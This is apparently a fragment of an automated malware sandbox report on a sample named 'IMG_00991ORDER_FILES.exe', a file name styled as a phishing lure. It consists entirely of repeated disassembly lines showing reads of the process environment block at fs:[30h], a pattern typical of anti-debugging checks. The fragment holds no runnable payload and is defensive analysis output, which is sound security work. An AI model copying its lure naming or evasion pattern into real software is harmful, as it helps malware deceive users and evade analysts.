Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351CF5C7 mov eax, dword ptr fs:[00000030h]	3_2_351CF5C7
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351CF5C7 mov eax, dword ptr fs:[00000030h]	3_2_351CF5C7
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351CF5C7 mov eax, dword ptr fs:[00000030h]	3_2_351CF5C7
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351CF5C7 mov eax, dword ptr fs:[00000030h]	3_2_351CF5C7
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351CF5C7 mov eax, dword ptr fs:[00000030h]	3_2_351CF5C7
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_352505C6 mov eax, dword ptr fs:[00000030h]	3_2_352505C6
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3520C5C6 mov eax, dword ptr fs:[00000030h]	3_2_3520C5C6
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_352065D0 mov eax, dword ptr fs:[00000030h]	3_2_352065D0
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351DB5E0 mov eax, dword ptr fs:[00000030h]	3_2_351DB5E0
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351DB5E0 mov eax, dword ptr fs:[00000030h]	3_2_351DB5E0
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351DB5E0 mov eax, dword ptr fs:[00000030h]	3_2_351DB5E0
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351DB5E0 mov eax, dword ptr fs:[00000030h]	3_2_351DB5E0
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351DB5E0 mov eax, dword ptr fs:[00000030h]	3_2_351DB5E0
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351DB5E0 mov eax, dword ptr fs:[00000030h]	3_2_351DB5E0
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35207425 mov eax, dword ptr fs:[00000030h]	3_2_35207425
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35207425 mov ecx, dword ptr fs:[00000030h]	3_2_35207425
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3525F42F mov eax, dword ptr fs:[00000030h]	3_2_3525F42F
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3525F42F mov eax, dword ptr fs:[00000030h]	3_2_3525F42F
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3525F42F mov eax, dword ptr fs:[00000030h]	3_2_3525F42F
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3525F42F mov eax, dword ptr fs:[00000030h]	3_2_3525F42F
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3525F42F mov eax, dword ptr fs:[00000030h]	3_2_3525F42F
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35259429 mov eax, dword ptr fs:[00000030h]	3_2_35259429
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351C640D mov eax, dword ptr fs:[00000030h]	3_2_351C640D
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3528F409 mov eax, dword ptr fs:[00000030h]	3_2_3528F409
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35266400 mov eax, dword ptr fs:[00000030h]	3_2_35266400
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35266400 mov eax, dword ptr fs:[00000030h]	3_2_35266400
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351CB420 mov eax, dword ptr fs:[00000030h]	3_2_351CB420
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351FE45E mov eax, dword ptr fs:[00000030h]	3_2_351FE45E
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351FE45E mov eax, dword ptr fs:[00000030h]	3_2_351FE45E
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351FE45E mov eax, dword ptr fs:[00000030h]	3_2_351FE45E
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351FE45E mov eax, dword ptr fs:[00000030h]	3_2_351FE45E
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351FE45E mov eax, dword ptr fs:[00000030h]	3_2_351FE45E
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351DD454 mov eax, dword ptr fs:[00000030h]	3_2_351DD454
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351DD454 mov eax, dword ptr fs:[00000030h]	3_2_351DD454
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351DD454 mov eax, dword ptr fs:[00000030h]	3_2_351DD454
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351DD454 mov eax, dword ptr fs:[00000030h]	3_2_351DD454
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351DD454 mov eax, dword ptr fs:[00000030h]	3_2_351DD454
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351DD454 mov eax, dword ptr fs:[00000030h]	3_2_351DD454
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3529A464 mov eax, dword ptr fs:[00000030h]	3_2_3529A464
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3528F478 mov eax, dword ptr fs:[00000030h]	3_2_3528F478
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351E0445 mov eax, dword ptr fs:[00000030h]	3_2_351E0445
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351E0445 mov eax, dword ptr fs:[00000030h]	3_2_351E0445
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351E0445 mov eax, dword ptr fs:[00000030h]	3_2_351E0445
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351E0445 mov eax, dword ptr fs:[00000030h]	3_2_351E0445
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351E0445 mov eax, dword ptr fs:[00000030h]	3_2_351E0445
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351E0445 mov eax, dword ptr fs:[00000030h]	3_2_351E0445
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351D8470 mov eax, dword ptr fs:[00000030h]	3_2_351D8470
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351D8470 mov eax, dword ptr fs:[00000030h]	3_2_351D8470
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3520D450 mov eax, dword ptr fs:[00000030h]	3_2_3520D450
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3520D450 mov eax, dword ptr fs:[00000030h]	3_2_3520D450
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3525D4A0 mov ecx, dword ptr fs:[00000030h]	3_2_3525D4A0
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3525D4A0 mov eax, dword ptr fs:[00000030h]	3_2_3525D4A0
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3525D4A0 mov eax, dword ptr fs:[00000030h]	3_2_3525D4A0
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_352044A8 mov eax, dword ptr fs:[00000030h]	3_2_352044A8
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351D0485 mov ecx, dword ptr fs:[00000030h]	3_2_351D0485
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3520E4BC mov eax, dword ptr fs:[00000030h]	3_2_3520E4BC
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3520648A mov eax, dword ptr fs:[00000030h]	3_2_3520648A
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3520648A mov eax, dword ptr fs:[00000030h]	3_2_3520648A
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3520648A mov eax, dword ptr fs:[00000030h]	3_2_3520648A
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3520B490 mov eax, dword ptr fs:[00000030h]	3_2_3520B490
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3520B490 mov eax, dword ptr fs:[00000030h]	3_2_3520B490
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3525C490 mov eax, dword ptr fs:[00000030h]	3_2_3525C490
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351D24A2 mov eax, dword ptr fs:[00000030h]	3_2_351D24A2
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351D24A2 mov ecx, dword ptr fs:[00000030h]	3_2_351D24A2
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_352054E0 mov eax, dword ptr fs:[00000030h]	3_2_352054E0
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351F44D1 mov eax, dword ptr fs:[00000030h]	3_2_351F44D1
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351F44D1 mov eax, dword ptr fs:[00000030h]	3_2_351F44D1
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351FF4D0 mov eax, dword ptr fs:[00000030h]	3_2_351FF4D0
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351FF4D0 mov eax, dword ptr fs:[00000030h]	3_2_351FF4D0
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351FF4D0 mov eax, dword ptr fs:[00000030h]	3_2_351FF4D0
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351FF4D0 mov eax, dword ptr fs:[00000030h]	3_2_351FF4D0
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351FF4D0 mov eax, dword ptr fs:[00000030h]	3_2_351FF4D0
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351FF4D0 mov eax, dword ptr fs:[00000030h]	3_2_351FF4D0
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351FF4D0 mov eax, dword ptr fs:[00000030h]	3_2_351FF4D0
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351FF4D0 mov eax, dword ptr fs:[00000030h]	3_2_351FF4D0
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351FF4D0 mov eax, dword ptr fs:[00000030h]	3_2_351FF4D0
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3520E4EF mov eax, dword ptr fs:[00000030h]	3_2_3520E4EF
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3520E4EF mov eax, dword ptr fs:[00000030h]	3_2_3520E4EF
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3520A4F0 mov eax, dword ptr fs:[00000030h]	3_2_3520A4F0
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3520A4F0 mov eax, dword ptr fs:[00000030h]	3_2_3520A4F0
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3528F4FD mov eax, dword ptr fs:[00000030h]	3_2_3528F4FD
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351F14C9 mov eax, dword ptr fs:[00000030h]	3_2_351F14C9
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351F14C9 mov eax, dword ptr fs:[00000030h]	3_2_351F14C9
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351F14C9 mov eax, dword ptr fs:[00000030h]	3_2_351F14C9
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351F14C9 mov eax, dword ptr fs:[00000030h]	3_2_351F14C9
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351F14C9 mov eax, dword ptr fs:[00000030h]	3_2_351F14C9
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351F94FA mov eax, dword ptr fs:[00000030h]	3_2_351F94FA
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351D64F0 mov eax, dword ptr fs:[00000030h]	3_2_351D64F0
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351D471B mov eax, dword ptr fs:[00000030h]	3_2_351D471B
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351D471B mov eax, dword ptr fs:[00000030h]	3_2_351D471B
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351F270D mov eax, dword ptr fs:[00000030h]	3_2_351F270D
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351F270D mov eax, dword ptr fs:[00000030h]	3_2_351F270D
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351F270D mov eax, dword ptr fs:[00000030h]	3_2_351F270D
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351CB705 mov eax, dword ptr fs:[00000030h]	3_2_351CB705
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351CB705 mov eax, dword ptr fs:[00000030h]	3_2_351CB705
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351CB705 mov eax, dword ptr fs:[00000030h]	3_2_351CB705
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351CB705 mov eax, dword ptr fs:[00000030h]	3_2_351CB705
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351DD700 mov ecx, dword ptr fs:[00000030h]	3_2_351DD700
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351F9723 mov eax, dword ptr fs:[00000030h]	3_2_351F9723
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3528F717 mov eax, dword ptr fs:[00000030h]	3_2_3528F717
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35211763 mov eax, dword ptr fs:[00000030h]	3_2_35211763
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35211763 mov eax, dword ptr fs:[00000030h]	3_2_35211763
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35211763 mov eax, dword ptr fs:[00000030h]	3_2_35211763
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35211763 mov eax, dword ptr fs:[00000030h]	3_2_35211763
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35211763 mov eax, dword ptr fs:[00000030h]	3_2_35211763
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35211763 mov eax, dword ptr fs:[00000030h]	3_2_35211763
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351CF75B mov eax, dword ptr fs:[00000030h]	3_2_351CF75B
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351CF75B mov eax, dword ptr fs:[00000030h]	3_2_351CF75B
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351CF75B mov eax, dword ptr fs:[00000030h]	3_2_351CF75B
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351CF75B mov eax, dword ptr fs:[00000030h]	3_2_351CF75B
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351CF75B mov eax, dword ptr fs:[00000030h]	3_2_351CF75B
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351CF75B mov eax, dword ptr fs:[00000030h]	3_2_351CF75B
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351CF75B mov eax, dword ptr fs:[00000030h]	3_2_351CF75B
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351CF75B mov eax, dword ptr fs:[00000030h]	3_2_351CF75B
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351CF75B mov eax, dword ptr fs:[00000030h]	3_2_351CF75B
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351F2755 mov eax, dword ptr fs:[00000030h]	3_2_351F2755
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351F2755 mov eax, dword ptr fs:[00000030h]	3_2_351F2755
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351F2755 mov eax, dword ptr fs:[00000030h]	3_2_351F2755
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351F2755 mov ecx, dword ptr fs:[00000030h]	3_2_351F2755
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351F2755 mov eax, dword ptr fs:[00000030h]	3_2_351F2755
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351F2755 mov eax, dword ptr fs:[00000030h]	3_2_351F2755
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35200774 mov eax, dword ptr fs:[00000030h]	3_2_35200774
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35203740 mov eax, dword ptr fs:[00000030h]	3_2_35203740
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351D4779 mov eax, dword ptr fs:[00000030h]	3_2_351D4779
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351D4779 mov eax, dword ptr fs:[00000030h]	3_2_351D4779
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3520174A mov eax, dword ptr fs:[00000030h]	3_2_3520174A
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3527E750 mov eax, dword ptr fs:[00000030h]	3_2_3527E750
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351E2760 mov ecx, dword ptr fs:[00000030h]	3_2_351E2760
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3529D7A7 mov eax, dword ptr fs:[00000030h]	3_2_3529D7A7
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3529D7A7 mov eax, dword ptr fs:[00000030h]	3_2_3529D7A7
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3529D7A7 mov eax, dword ptr fs:[00000030h]	3_2_3529D7A7
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_352A17BC mov eax, dword ptr fs:[00000030h]	3_2_352A17BC
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_352AB781 mov eax, dword ptr fs:[00000030h]	3_2_352AB781
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_352AB781 mov eax, dword ptr fs:[00000030h]	3_2_352AB781
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35201796 mov eax, dword ptr fs:[00000030h]	3_2_35201796
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35201796 mov eax, dword ptr fs:[00000030h]	3_2_35201796
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3524E79D mov eax, dword ptr fs:[00000030h]	3_2_3524E79D
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3524E79D mov eax, dword ptr fs:[00000030h]	3_2_3524E79D
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3524E79D mov eax, dword ptr fs:[00000030h]	3_2_3524E79D
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3524E79D mov eax, dword ptr fs:[00000030h]	3_2_3524E79D
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3524E79D mov eax, dword ptr fs:[00000030h]	3_2_3524E79D
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3524E79D mov eax, dword ptr fs:[00000030h]	3_2_3524E79D
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3524E79D mov eax, dword ptr fs:[00000030h]	3_2_3524E79D
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3524E79D mov eax, dword ptr fs:[00000030h]	3_2_3524E79D
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3524E79D mov eax, dword ptr fs:[00000030h]	3_2_3524E79D
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351D07A7 mov eax, dword ptr fs:[00000030h]	3_2_351D07A7
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351D77F9 mov eax, dword ptr fs:[00000030h]	3_2_351D77F9
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351D77F9 mov eax, dword ptr fs:[00000030h]	3_2_351D77F9
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3528F7CF mov eax, dword ptr fs:[00000030h]	3_2_3528F7CF
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351D37E4 mov eax, dword ptr fs:[00000030h]	3_2_351D37E4
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351D37E4 mov eax, dword ptr fs:[00000030h]	3_2_351D37E4
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351D37E4 mov eax, dword ptr fs:[00000030h]	3_2_351D37E4
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351D37E4 mov eax, dword ptr fs:[00000030h]	3_2_351D37E4
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351D37E4 mov eax, dword ptr fs:[00000030h]	3_2_351D37E4
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351D37E4 mov eax, dword ptr fs:[00000030h]	3_2_351D37E4
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351D37E4 mov eax, dword ptr fs:[00000030h]	3_2_351D37E4
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351FE7E0 mov eax, dword ptr fs:[00000030h]	3_2_351FE7E0
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3527D62C mov ecx, dword ptr fs:[00000030h]	3_2_3527D62C
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3527D62C mov ecx, dword ptr fs:[00000030h]	3_2_3527D62C
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3527D62C mov eax, dword ptr fs:[00000030h]	3_2_3527D62C
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35200630 mov eax, dword ptr fs:[00000030h]	3_2_35200630
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35258633 mov esi, dword ptr fs:[00000030h]	3_2_35258633
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35258633 mov eax, dword ptr fs:[00000030h]	3_2_35258633
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35258633 mov eax, dword ptr fs:[00000030h]	3_2_35258633
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351FD600 mov eax, dword ptr fs:[00000030h]	3_2_351FD600
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351FD600 mov eax, dword ptr fs:[00000030h]	3_2_351FD600
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_352A4600 mov eax, dword ptr fs:[00000030h]	3_2_352A4600
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351D0630 mov eax, dword ptr fs:[00000030h]	3_2_351D0630
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35263608 mov eax, dword ptr fs:[00000030h]	3_2_35263608
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35263608 mov eax, dword ptr fs:[00000030h]	3_2_35263608
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35263608 mov eax, dword ptr fs:[00000030h]	3_2_35263608
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35263608 mov eax, dword ptr fs:[00000030h]	3_2_35263608
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35263608 mov eax, dword ptr fs:[00000030h]	3_2_35263608
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35263608 mov eax, dword ptr fs:[00000030h]	3_2_35263608
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3528F607 mov eax, dword ptr fs:[00000030h]	3_2_3528F607
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3520360F mov eax, dword ptr fs:[00000030h]	3_2_3520360F
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351D7623 mov eax, dword ptr fs:[00000030h]	3_2_351D7623
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351D5622 mov eax, dword ptr fs:[00000030h]	3_2_351D5622
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351D5622 mov eax, dword ptr fs:[00000030h]	3_2_351D5622
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351D965A mov eax, dword ptr fs:[00000030h]	3_2_351D965A
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351D965A mov eax, dword ptr fs:[00000030h]	3_2_351D965A
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3520666D mov esi, dword ptr fs:[00000030h]	3_2_3520666D
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3520666D mov eax, dword ptr fs:[00000030h]	3_2_3520666D
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3520666D mov eax, dword ptr fs:[00000030h]	3_2_3520666D
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35212670 mov eax, dword ptr fs:[00000030h]	3_2_35212670
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35212670 mov eax, dword ptr fs:[00000030h]	3_2_35212670
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351CD64A mov eax, dword ptr fs:[00000030h]	3_2_351CD64A
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351CD64A mov eax, dword ptr fs:[00000030h]	3_2_351CD64A
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351D3640 mov eax, dword ptr fs:[00000030h]	3_2_351D3640
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351EF640 mov eax, dword ptr fs:[00000030h]	3_2_351EF640
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351EF640 mov eax, dword ptr fs:[00000030h]	3_2_351EF640
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351EF640 mov eax, dword ptr fs:[00000030h]	3_2_351EF640
